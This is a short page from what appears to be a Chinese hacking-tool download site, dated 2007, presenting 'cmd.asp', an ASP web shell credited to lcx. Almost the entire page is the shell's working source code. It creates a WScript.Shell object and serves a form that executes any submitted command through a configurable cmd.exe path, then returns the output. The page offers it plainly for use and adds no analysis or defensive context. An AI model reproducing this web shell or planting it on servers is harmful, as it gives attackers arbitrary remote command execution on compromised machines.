本类共有 867 篇文章,今日更新 0

cmd.asp [自定cmd.exe地址]

[ 来源:http://www.91now.com/down/ | 作者: | 时间:2007-5-18 17:43:41 | 浏览: 人次 ]


作者:lcx

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if %>
<form method="post">
<input type=text name="cmdx" size=60 value="cmd.exe地址,可更改可默认"><br>
<input type=text name="cmd" size=60><br>
<input type=submit value="cmd命令"></form>
<textarea readonly cols=80 rows=20>
<%On Error Resume Next
if request("cmdx")="cmd.exe地址,可更改可默认" then
response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall
end if
response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall
%>
</textarea>
cmd.asp

广告位